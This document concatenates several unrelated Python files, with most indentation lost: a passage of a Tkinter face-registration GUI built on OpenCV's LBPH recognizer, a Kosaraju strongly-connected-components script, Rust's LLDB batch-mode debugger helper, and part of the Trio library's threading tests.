Labels = np.asarray(Labels, dtype=np.int32)
model = cv2.face.LBPHFaceRecognizer_create()
model.train(np.asarray(Training_data), np.asarray(Labels))
print('Model Trained Successfully !!!')
model.save('userData/trainer.yml')
print('Model Saved !!!')
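# Note: cv2.face (LBPHFaceRecognizer_create) is shipped in the opencv-contrib-python
# package; the base opencv-python wheel does not include it.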
def face_extractor(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(gray, 1.3, 5)
    if len(faces) == 0:
return None
for (x, y, w, h) in faces:
cropped_face = img[y:y+h, x:x+w]
return cropped_face
cap = None
count = 0
def startCapturing():
global count, cap
ret, frame = cap.read()
if face_extractor(frame) is not None:
count += 1
face = cv2.resize(face_extractor(frame), (200, 200))
face = cv2.cvtColor(face, cv2.COLOR_BGR2GRAY)
file_name_path = 'userData/faceData/img' + str(count) + '.png'
cv2.imwrite(file_name_path, face)
print(count)
progress_bar['value'] = count
cv2.putText(face, str(count), (50, 50), cv2.FONT_HERSHEY_COMPLEX, 1, (0,255,0), 2)
else:
pass
if count==100:
progress_bar.destroy()
lmain['image'] = defaultImg2
statusLbl['text'] = '(Face added successfully)'
cap.release()
cv2.destroyAllWindows()
Thread(target=trainFace).start()
addBtn['text'] = ' Next '
addBtn['command'] = lambda:raise_frame(root3)
return
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
frame = cv2.flip(frame, 1)
img = Image.fromarray(frame)
imgtk = ImageTk.PhotoImage(image=img)
lmain.imgtk = imgtk
lmain.configure(image=imgtk)
lmain.after(10, startCapturing)
def Add_Face():
global cap, user_name, user_gender
user_name = nameField.get()
user_gender = r.get()
if user_name != '' and user_gender!=0:
if agr.get()==1:
cap = cv2.VideoCapture(0)
startCapturing()
progress_bar.place(x=20, y=273)
statusLbl['text'] = ''
else:
statusLbl['text'] = '(Check the Condition)'
else:
statusLbl['text'] = '(Please fill the details)'
def SuccessfullyRegistered():
if avatarChoosen != 0:
gen = 'Male'
if user_gender==2: gen = 'Female'
u = UserData()
u.updateData(user_name, gen, avatarChoosen)
usernameLbl['text'] = user_name
raise_frame(root4)
def selectAVATAR(avt=0):
global avatarChoosen, choosedAvtrImage
avatarChoosen = avt
i=1
for avtr in (avtb1,avtb2,avtb3,avtb4,avtb5,avtb6,avtb7,avtb8):
if i==avt:
avtr['state'] = 'disabled'
userPIC['image'] = avtr['image']
else: avtr['state'] = 'normal'
i+=1
################################################# GUI ###############################
def raise_frame(frame):
frame.tkraise()
if __name__ == '__main__':
root = Tk()
root.title('F.R.I.D.A.Y.')
w_width, w_height = 350, 600
s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()
x, y = (s_width/2)-(w_width/2), (s_height/2)-(w_height/2)
root.geometry('%dx%d+%d+%d' % (w_width,w_height,x,y-30)) #center location of the screen
root.configure(bg=background)
# root.attributes('-toolwindow', True)
root1 = Frame(root, bg=background)
root2 = Frame(root, bg=background)
root3 = Frame(root, bg=background)
root4 = Frame(root, bg=background)
for f in (root1, root2, root3, root4):
f.grid(row=0, column=0, sticky='news')
################################
######## MAIN SCREEN #########
################################
image1 = Image.open('extrafiles/images/home2.jpg')
image1 = image1.resize((300,250))
defaultImg1 = ImageTk.PhotoImage(image1)
dataFrame1 = Frame(root1, bd=10, bg=background)
dataFrame1.pack()
logo = Label(dataFrame1, width=300, height=250, image=defaultImg1)
logo.pack(padx=10, pady=10)
#welcome label
welcLbl = Label(root1, text='Hi there,\nWelcome to the world of\nScience & Technology', font=('Arial Bold', 15), fg='#303E54', bg=background)
welcLbl.pack(padx=10, pady=20)
#add face
loginStatus = Label(root1, text='LOCKED', font=('Arial Bold', 15), bg=background, fg='red')
loginStatus.pack(pady=(40,20))
    if not os.path.exists('userData/trainer.yml'):
loginStatus['text'] = 'Your Face is not registered'
addFace = Button(root1, text=' Register Face ', font=('Arial', 12), bg='#018384', fg='white', relief=FLAT, command=lambda:raise_frame(root2))
addFace.pack(ipadx=10)
else:
# pass
Thread(target=startLogin).start()
#status of add face
faceStatus = Label(root1, text='(Face Not Detected)', font=('Arial 10'), fg=textColor, bg=background)
faceStatus.pack(pady=5)
##################################
######## FACE ADD SCREEN #######
##################################
image2 = Image.open('extrafiles/images/defaultFace4.png')
image2 = image2.resize((300, 250))
defaultImg2 = ImageTk.PhotoImage(image2)
dataFrame2 = Frame(root2, bd=10, bg=background)
dataFrame2.pack(fill=X)
lmain = Label(dataFrame2, width=300, height=250, image=defaultImg2)
lmain.pack(padx=10, pady=10)
#Details
detailFrame2 = Frame(root2, bd=10, bg=background)
detailFrame2.pack(fill=X)
userFrame2 = Frame(detailFrame2, bd=10, width=300, height=250, relief=FLAT, bg=background)
userFrame2.pack(padx=10, pady=10)
#progress
progress_bar = ttk.Progressbar(root2, orient=HORIZONTAL, length=303, mode='determinate')
#name
nameLbl = Label(userFrame2, text='Name', font=('Arial Bold', 12), fg='#303E54', bg=background)
nameLbl.place(x=10,y=10)
nameField = Entry(userFrame2, bd=5, font=('Arial Bold', 10), width=25, relief=FLAT, bg='#D4D5D7')
nameField.focus()
nameField.place(x=80,y=10)
genLbl = Label(userFrame2, text='Gender', font=('Arial Bold', 12), fg='#303E54', bg=background)
genLbl.place(x=10,y=50)
r = IntVar()
s = ttk.Style()
s.configure('Wild.TRadiobutton', background=background, foreground=textColor, font=('Arial Bold', 10), focuscolor=s.configure(".")["background"])
genMale = ttk.Radiobutton(userFrame2, text='Male', value=1, variable=r, style='Wild.TRadiobutton', takefocus=False)
genMale.place(x=80,y=52)
genFemale = ttk.Radiobutton(userFrame2, text='Female', value=2, variable=r, style='Wild.TRadiobutton', takefocus=False)
genFemale.place(x=150,y=52)
#agreement
agr = IntVar()
sc = ttk.Style()
sc.configure('Wild.TCheckbutton', background=background, foreground='#303E54', font=('Arial Bold',10), focuscolor=sc.configure(".")["background"])
# agree = Checkbutton(userFrame2, text='I agree to use my face for Security purpose', fg=textColor, bg=background, activebackground=background, activeforeground=textColor)
agree = ttk.Checkbutton(userFrame2, text='I agree to use my Face for Security', style='Wild.TCheckbutton', takefocus=False, variable=agr)
agree.place(x=28, y=100)
#add face
addBtn = Button(userFrame2, text=' Add Face ', font=('Arial Bold', 12), bg='#01933B', fg='white', command=Add_Face, relief=FLAT)
addBtn.place(x=90, y=150)
#status of add face
statusLbl = Label(userFrame2, text='', font=('Arial 10'), fg=textColor, bg=background)
statusLbl.place(x=80, y=190)
##########################
#### AVATAR SELECTION ####
##########################
Label(root3, text="Choose Your Avatar", font=('arial', 15), bg=background, fg='#303E54').pack()
avatarContainer = Frame(root3, bg=background, width=300, height=500)
avatarContainer.pack(pady=10)
size = 100
avtr1 = Image.open('extrafiles/images/avatars/a1.png')
avtr1 = avtr1.resize((size, size))
avtr1 = ImageTk.PhotoImage(avtr1)
avtr2 = Image.open('extrafiles/images/avatars/a2.png')
avtr2 = avtr2.resize((size, size))
avtr2 = ImageTk.PhotoImage(avtr2)
avtr3 = Image.open('extrafiles/images/avatars/a3.png')
avtr3 = avtr3.resize((size, size))
avtr3 = ImageTk.PhotoImage(avtr3)
avtr4 = Image.open('extrafiles/images/avatars/a4.png')
avtr4 = avtr4.resize((size, size))
avtr4 = ImageTk.PhotoImage(avtr4)
avtr5 = Image.open('extrafiles/images/avatars/a5.png')
avtr5 = avtr5.resize((size, size))
avtr5 = ImageTk.PhotoImage(avtr5)
avtr6 = Image.open('extrafiles/images/avatars/a6.png')
avtr6 = avtr6.resize((size, size))
avtr6 = ImageTk.PhotoImage(avtr6)
avtr7 = Image.open('extrafiles/images/avatars/a7.png')
avtr7 = avtr7.resize((size, size))
avtr7 = ImageTk.PhotoImage(avtr7)
avtr8 = Image.open('extrafiles/images/avatars/a8.png')
avtr8 = avtr8.resize((size, size))
avtr8 = ImageTk.PhotoImage(avtr8)
avtb1 = Button(avatarContainer, image=avtr1, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(1))
avtb1.grid(row=0, column=0, ipadx=25, ipady=10)
avtb2 = Button(avatarContainer, image=avtr2, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(2))
avtb2.grid(row=0, column=1, ipadx=25, ipady=10)
avtb3 = Button(avatarContainer, image=avtr3, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(3))
avtb3.grid(row=1, column=0, ipadx=25, ipady=10)
avtb4 = Button(avatarContainer, image=avtr4, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(4))
avtb4.grid(row=1, column=1, ipadx=25, ipady=10)
avtb5 = Button(avatarContainer, image=avtr5, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(5))
avtb5.grid(row=2, column=0, ipadx=25, ipady=10)
avtb6 = Button(avatarContainer, image=avtr6, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(6))
avtb6.grid(row=2, column=1, ipadx=25, ipady=10)
avtb7 = Button(avatarContainer, image=avtr7, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(7))
avtb7.grid(row=3, column=0, ipadx=25, ipady=10)
avtb8 = Button(avatarContainer, image=avtr8, bg=background, activebackground=background, relief=FLAT, bd=0, command=lambda:selectAVATAR(8))
avtb8.grid(row=3, column=1, ipadx=25, ipady=10)
Button(root3, text=' Submit ', font=('Arial Bold', 15), bg='#01933B', fg='white', bd=0, relief=FLAT, command=SuccessfullyRegistered).pack()
#########################################
######## SUCCESSFULL REGISTRATION #######
#########################################
userPIC = Label(root4, bg=background, image=avtr1)
userPIC.pack(pady=(40, 10))
usernameLbl = Label(root4, text="Roshan Kumar", font=('Arial Bold',15), bg=background, fg='#85AD4F')
usernameLbl.pack(pady=(0, 70))
Label(root4, text="Your account has been successfully activated!", font=('Arial Bold',15), bg=background, fg='#303E54', wraplength=300).pack(pady=10)
Label(root4, text="Launch the APP again to get started the conversation with your Personal Assistant", font=('arial',13), bg=background, fg='#A3A5AB', wraplength=350).pack()
Button(root4, text=' OK ', bg='#0475BB', fg='white',font=('Arial Bold', 18), bd=0, relief=FLAT, command=lambda:quit()).pack(pady=50)
root.iconbitmap('extrafiles/images/assistant2.ico')
raise_frame(root1)
root.mainloop()
|
KosarajuSCC.py
|
import sys
import os
from pprint import pprint
import threading
class Graph(object):
def __init__(self, filepath=None):
self._adj_list = []
self._reverse_adj_list = []
if filepath:
self._read(filepath)
def _read(self, filepath):
with open(filepath) as f:
lines = f.readlines()
            lines = [l for l in lines if l.strip()]
for line in lines:
num1, num2 = line.split()
v_from = int(num1)
v_to = int(num2)
max_v = max(v_from, v_to)
while (len(self._adj_list) < max_v):
self._adj_list.append([])
while (len(self._reverse_adj_list) < max_v):
self._reverse_adj_list.append([])
self._adj_list[v_from - 1].append(v_to - 1)
self._reverse_adj_list[v_to - 1].append(v_from - 1)
@property
def reverse(self):
return self._reverse_adj_list
@property
def graph(self):
return self._adj_list
class KosarajuSCC(object):
def __init__(self, graph):
self.graph = graph.graph
self.graph_rev = graph.reverse
self.t = 0
self.n = len(self.graph_rev)
self.explored = [False] * self.n
self.sorted_by_finish_time = [None] * self.n
self.scc_size = 0
def _dfs_loop1(self):
self.t = 0
self.explored = [False] * self.n
self.sorted_by_finish_time = [None] * self.n
def dfs(graph_rev, i):
self.explored[i] = True
for v in graph_rev[i]:
if not self.explored[v]:
dfs(graph_rev, v)
self.sorted_by_finish_time[self.t] = i
self.t += 1
        for i in reversed(range(self.n)):
if not self.explored[i]:
dfs(self.graph_rev, i)
def _dfs_loop2(self):
self.explored = [False] * len(self.graph)
res = []
def dfs(graph, i):
self.explored[i] = True
for v in graph[i]:
if not self.explored[v]:
dfs(graph, v)
self.scc_size += 1
for i in reversed(range(len(self.graph))):
if not self.explored[self.sorted_by_finish_time[i]]:
self.scc_size = 0
dfs(self.graph, self.sorted_by_finish_time[i])
res.append(self.scc_size)
return res
def kosaraju_scc_sizes(self):
self._dfs_loop1()
res = self._dfs_loop2()
return res
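# Example usage (sketch; the edge file content is illustrative):
#   a file containing the directed edges
#       1 2
#       2 1
#       2 3
#   has two SCCs, {1, 2} and {3}, so the sizes returned by
#   KosarajuSCC(Graph('edges.txt')).kosaraju_scc_sizes() sort to [2, 1].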
def main():
CURDIR = os.path.dirname(os.path.abspath(__file__))
FILEPATH = os.path.join(CURDIR, "SCC.txt")
print "start"
graph = Graph(FILEPATH)
print "read graph"
print "calculating scc sizes"
res = KosarajuSCC(graph).kosaraju_scc_sizes()
print ','.join(map(lambda x: str(x), sorted(res)[::-1][:5]))
if __name__ == '__main__':
threading.stack_size(67108864)
sys.setrecursionlimit(2 ** 20)
thread = threading.Thread(target=main)
thread.start()
|
lldb_batchmode.py
|
# Copyright 2014 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# This script allows you to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S commandline options which also execute a list of commands from a text
# file. However, those commands are executed `immediately`: a command following a `run` or `continue`
# command will be executed immediately after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. Thus a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running and will
# thus fail. Using this Python script, the above will work as expected.
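# Example invocation (illustrative paths):
#
#   python lldb_batchmode.py ./target/debug/my-binary ./debug-script.txt
#
# where debug-script.txt contains one LLDB command per line, e.g. the
# break/run/print sequence shown above.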
from __future__ import print_function
import lldb
import os
import sys
import threading
import thread
import re
import time
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"Print something if DEBUG_OUTPUT is True"
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"Replace newlines, tabs, multiple spaces, etc with exactly one space"
return re.sub("\s+", " ", s)
def breakpoint_callback(frame, bp_loc, dict):
"""This callback is registered with every breakpoint and makes sure that the
frame containing the breakpoint location is selected"""
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"Executes a single CLI command"
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
print(normalize_whitespace(res.GetOutput()), end='\n')
# If the command introduced any breakpoints, make sure to register
# them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." %
str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = ("breakpoint command add -F breakpoint_callback " +
str(breakpoint_id))
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " +
str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " +
str(breakpoint_id))
else:
print(res.GetError())
def start_breakpoint_listener(target):
"""Listens for breakpoints being added and adds new ones to the callback
registration list"""
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target=listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"""Starts a watchdog thread that will terminate the process after a certain
period of time"""
watchdog_start_time = time.clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while time.clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target=watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " +
str(target_error) + ". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file=sys.stderr)
print(e, file=sys.stderr)
print("Aborting.", file=sys.stderr)
sys.exit(1)
finally:
script_file.close()
|
test_threads.py
|
import threading
import queue as stdlib_queue
import time
import pytest
from .. import _core
from .. import Event, CapacityLimiter, sleep
from ..testing import wait_all_tasks_blocked
from .._threads import (
to_thread_run_sync,
current_default_thread_limiter,
from_thread_run,
from_thread_run_sync,
)
from .._core.tests.test_ki import ki_self
async def test_do_in_trio_thread():
trio_thread = threading.current_thread()
async def check_case(do_in_trio_thread, fn, expected, trio_token=None):
record = []
def threadfn():
try:
record.append(("start", threading.current_thread()))
x = do_in_trio_thread(fn, record, trio_token=trio_token)
record.append(("got", x))
except BaseException as exc:
print(exc)
record.append(("error", type(exc)))
child_thread = threading.Thread(target=threadfn, daemon=True)
child_thread.start()
while child_thread.is_alive():
print("yawn")
await sleep(0.01)
assert record == [("start", child_thread), ("f", trio_thread), expected]
token = _core.current_trio_token()
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
return 2
await check_case(from_thread_run_sync, f, ("got", 2), trio_token=token)
def f(record):
assert not _core.currently_ki_protected()
record.append(("f", threading.current_thread()))
raise ValueError
await check_case(from_thread_run_sync, f, ("error", ValueError), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
return 3
await check_case(from_thread_run, f, ("got", 3), trio_token=token)
async def f(record):
assert not _core.currently_ki_protected()
await _core.checkpoint()
record.append(("f", threading.current_thread()))
raise KeyError
await check_case(from_thread_run, f, ("error", KeyError), trio_token=token)
async def test_do_in_trio_thread_from_trio_thread():
with pytest.raises(RuntimeError):
from_thread_run_sync(lambda: None) # pragma: no branch
async def foo(): # pragma: no cover
pass
with pytest.raises(RuntimeError):
from_thread_run(foo)
def test_run_in_trio_thread_ki():
# if we get a control-C during a run_in_trio_thread, then it propagates
# back to the caller (slick!)
record = set()
async def check_run_in_trio_thread():
token = _core.current_trio_token()
def trio_thread_fn():
print("in Trio thread")
assert not _core.currently_ki_protected()
print("ki_self")
try:
ki_self()
finally:
import sys
print("finally", sys.exc_info())
async def trio_thread_afn():
trio_thread_fn()
def external_thread_fn():
try:
print("running")
from_thread_run_sync(trio_thread_fn, trio_token=token)
except KeyboardInterrupt:
print("ok1")
record.add("ok1")
try:
from_thread_run(trio_thread_afn, trio_token=token)
except KeyboardInterrupt:
print("ok2")
record.add("ok2")
thread = threading.Thread(target=external_thread_fn)
thread.start()
print("waiting")
while thread.is_alive():
await sleep(0.01)
print("waited, joining")
thread.join()
print("done")
_core.run(check_run_in_trio_thread)
assert record == {"ok1", "ok2"}
def test_await_in_trio_thread_while_main_exits():
record = []
ev = Event()
async def trio_fn():
record.append("sleeping")
ev.set()
await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def thread_fn(token):
try:
from_thread_run(trio_fn, trio_token=token)
except _core.Cancelled:
record.append("cancelled")
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=thread_fn, args=(token,))
thread.start()
await ev.wait()
assert record == ["sleeping"]
return thread
thread = _core.run(main)
thread.join()
assert record == ["sleeping", "cancelled"]
async def test_run_in_worker_thread():
trio_thread = threading.current_thread()
def f(x):
return (x, threading.current_thread())
x, child_thread = await to_thread_run_sync(f, 1)
assert x == 1
assert child_thread != trio_thread
def g():
raise ValueError(threading.current_thread())
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(g)
print(excinfo.value.args)
assert excinfo.value.args[0] != trio_thread
async def test_run_in_worker_thread_cancellation():
register = [None]
def f(q):
# Make the thread block for a controlled amount of time
register[0] = "blocking"
q.get()
register[0] = "finished"
async def child(q, cancellable):
record.append("start")
try:
return await to_thread_run_sync(f, q, cancellable=cancellable)
finally:
record.append("exit")
record = []
q = stdlib_queue.Queue()
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, True)
# Give it a chance to get started. (This is important because
# to_thread_run_sync does a checkpoint_if_cancelled before
# blocking on the thread, and we don't want to trigger this.)
await wait_all_tasks_blocked()
assert record == ["start"]
# Then cancel it.
nursery.cancel_scope.cancel()
# The task exited, but the thread didn't:
assert register[0] != "finished"
# Put the thread out of its misery:
q.put(None)
while register[0] != "finished":
time.sleep(0.01)
# This one can't be cancelled
record = []
register[0] = None
async with _core.open_nursery() as nursery:
nursery.start_soon(child, q, False)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
for _ in range(10):
await _core.checkpoint()
# It's still running
assert record == ["start"]
q.put(None)
# Now it exits
# But if we cancel *before* it enters, the entry is itself a cancellation
# point
with _core.CancelScope() as scope:
scope.cancel()
await child(q, False)
assert scope.cancelled_caught
# Make sure that if trio.run exits, and then the thread finishes, then that's
# handled gracefully. (Requires that the thread result machinery be prepared
# for call_soon to raise RunFinishedError.)
def test_run_in_worker_thread_abandoned(capfd, monkeypatch):
monkeypatch.setattr(_core._thread_cache, "IDLE_TIMEOUT", 0.01)
q1 = stdlib_queue.Queue()
q2 = stdlib_queue.Queue()
def thread_fn():
q1.get()
q2.put(threading.current_thread())
async def main():
async def child():
await to_thread_run_sync(thread_fn, cancellable=True)
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
nursery.cancel_scope.cancel()
_core.run(main)
q1.put(None)
# This makes sure:
# - the thread actually ran
# - that thread has finished before we check for its output
thread = q2.get()
while thread.is_alive():
time.sleep(0.01) # pragma: no cover
# Make sure we don't have a "Exception in thread ..." dump to the console:
out, err = capfd.readouterr()
assert "Exception in thread" not in out
assert "Exception in thread" not in err
@pytest.mark.parametrize("MAX", [3, 5, 10])
@pytest.mark.parametrize("cancel", [False, True])
@pytest.mark.parametrize("use_default_limiter", [False, True])
async def test_run_in_worker_thread_limiter(MAX, cancel, use_default_limiter):
# This test is a bit tricky. The goal is to make sure that if we set
# limiter=CapacityLimiter(MAX), then in fact only MAX threads are ever
# running at a time, even if there are more concurrent calls to
# to_thread_run_sync, and even if some of those are cancelled. And
# also to make sure that the default limiter actually limits.
COUNT = 2 * MAX
gate = threading.Event()
lock = threading.Lock()
if use_default_limiter:
c = current_default_thread_limiter()
orig_total_tokens = c.total_tokens
c.total_tokens = MAX
limiter_arg = None
else:
c = CapacityLimiter(MAX)
orig_total_tokens = MAX
limiter_arg = c
try:
# We used to use regular variables and 'nonlocal' here, but it turns
# out that it's not safe to assign to closed-over variables that are
# visible in multiple threads, at least as of CPython 3.6 and PyPy
# 5.8:
#
# https://bugs.python.org/issue30744
# https://bitbucket.org/pypy/pypy/issues/2591/
#
# Mutating them in-place is OK though (as long as you use proper
# locking etc.).
class state:
pass
state.ran = 0
state.high_water = 0
state.running = 0
state.parked = 0
token = _core.current_trio_token()
def thread_fn(cancel_scope):
print("thread_fn start")
from_thread_run_sync(cancel_scope.cancel, trio_token=token)
with lock:
state.ran += 1
state.running += 1
state.high_water = max(state.high_water, state.running)
# The Trio thread below watches this value and uses it as a
# signal that all the stats calculations have finished.
state.parked += 1
gate.wait()
with lock:
state.parked -= 1
state.running -= 1
print("thread_fn exiting")
async def run_thread(event):
with _core.CancelScope() as cancel_scope:
await to_thread_run_sync(
thread_fn, cancel_scope, limiter=limiter_arg, cancellable=cancel
)
print("run_thread finished, cancelled:", cancel_scope.cancelled_caught)
event.set()
async with _core.open_nursery() as nursery:
print("spawning")
events = []
for i in range(COUNT):
events.append(Event())
nursery.start_soon(run_thread, events[-1])
await wait_all_tasks_blocked()
# In the cancel case, we in particular want to make sure that the
# cancelled tasks don't release the semaphore. So let's wait until
# at least one of them has exited, and that everything has had a
# chance to settle down from this, before we check that everyone
# who's supposed to be waiting is waiting:
if cancel:
print("waiting for first cancellation to clear")
await events[0].wait()
await wait_all_tasks_blocked()
# Then wait until the first MAX threads are parked in gate.wait(),
# and the next MAX threads are parked on the semaphore, to make
# sure no-one is sneaking past, and to make sure the high_water
# check below won't fail due to scheduling issues. (It could still
# fail if too many threads are let through here.)
while state.parked != MAX or c.statistics().tasks_waiting != MAX:
await sleep(0.01) # pragma: no cover
# Then release the threads
gate.set()
assert state.high_water == MAX
if cancel:
# Some threads might still be running; need to wait to them to
# finish before checking that all threads ran. We can do this
# using the CapacityLimiter.
while c.borrowed_tokens > 0:
await sleep(0.01) # pragma: no cover
assert state.ran == COUNT
assert state.running == 0
finally:
c.total_tokens = orig_total_tokens
async def test_run_in_worker_thread_custom_limiter():
# Basically just checking that we only call acquire_on_behalf_of and
# release_on_behalf_of, since that's part of our documented API.
record = []
class CustomLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
self._borrower = borrower
def release_on_behalf_of(self, borrower):
record.append("release")
assert borrower == self._borrower
await to_thread_run_sync(lambda: None, limiter=CustomLimiter())
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_limiter_error():
record = []
class BadCapacityLimiter:
async def acquire_on_behalf_of(self, borrower):
record.append("acquire")
def release_on_behalf_of(self, borrower):
record.append("release")
raise ValueError
bs = BadCapacityLimiter()
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: None, limiter=bs)
assert excinfo.value.__context__ is None
assert record == ["acquire", "release"]
record = []
# If the original function raised an error, then the semaphore error
# chains with it
d = {}
with pytest.raises(ValueError) as excinfo:
await to_thread_run_sync(lambda: d["x"], limiter=bs)
assert isinstance(excinfo.value.__context__, KeyError)
assert record == ["acquire", "release"]
async def test_run_in_worker_thread_fail_to_spawn(monkeypatch):
# Test the unlikely but possible case where trying to spawn a thread fails
def bad_start(self, *args):
raise RuntimeError("the engines canna take it captain")
monkeypatch.setattr(_core._thread_cache.ThreadCache, "start_thread_soon", bad_start)
limiter = current_default_thread_limiter()
assert limiter.borrowed_tokens == 0
# We get an appropriate error, and the limiter is cleanly released
with pytest.raises(RuntimeError) as excinfo:
await to_thread_run_sync(lambda: None) # pragma: no cover
assert "engines" in str(excinfo.value)
assert limiter.borrowed_tokens == 0
async def test_trio_to_thread_run_sync_token():
# Test that to_thread_run_sync automatically injects the current trio token
# into a spawned thread
def thread_fn():
callee_token = from_thread_run_sync(_core.current_trio_token)
return callee_token
caller_token = _core.current_trio_token()
callee_token = await to_thread_run_sync(thread_fn)
assert callee_token == caller_token
async def test_trio_to_thread_run_sync_expected_error():
# Test correct error when passed async function
async def async_fn(): # pragma: no cover
pass
with pytest.raises(TypeError, match="expected a sync function"):
await to_thread_run_sync(async_fn)
async def test_trio_from_thread_run_sync():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run_sync()
def thread_fn():
trio_time = from_thread_run_sync(_core.current_time)
return trio_time
trio_time = await to_thread_run_sync(thread_fn)
assert isinstance(trio_time, float)
# Test correct error when passed async function
async def async_fn(): # pragma: no cover
pass
def thread_fn():
from_thread_run_sync(async_fn)
with pytest.raises(TypeError, match="expected a sync function"):
await to_thread_run_sync(thread_fn)
async def test_trio_from_thread_run():
# Test that to_thread_run_sync correctly "hands off" the trio token to
# trio.from_thread.run()
record = []
async def back_in_trio_fn():
_core.current_time() # implicitly checks that we're in trio
record.append("back in trio")
def thread_fn():
record.append("in thread")
from_thread_run(back_in_trio_fn)
await to_thread_run_sync(thread_fn)
assert record == ["in thread", "back in trio"]
# Test correct error when passed sync function
def sync_fn(): # pragma: no cover
pass
with pytest.raises(TypeError, match="appears to be synchronous"):
await to_thread_run_sync(from_thread_run, sync_fn)
async def test_trio_from_thread_token():
# Test that to_thread_run_sync and spawned trio.from_thread.run_sync()
# share the same Trio token
def thread_fn():
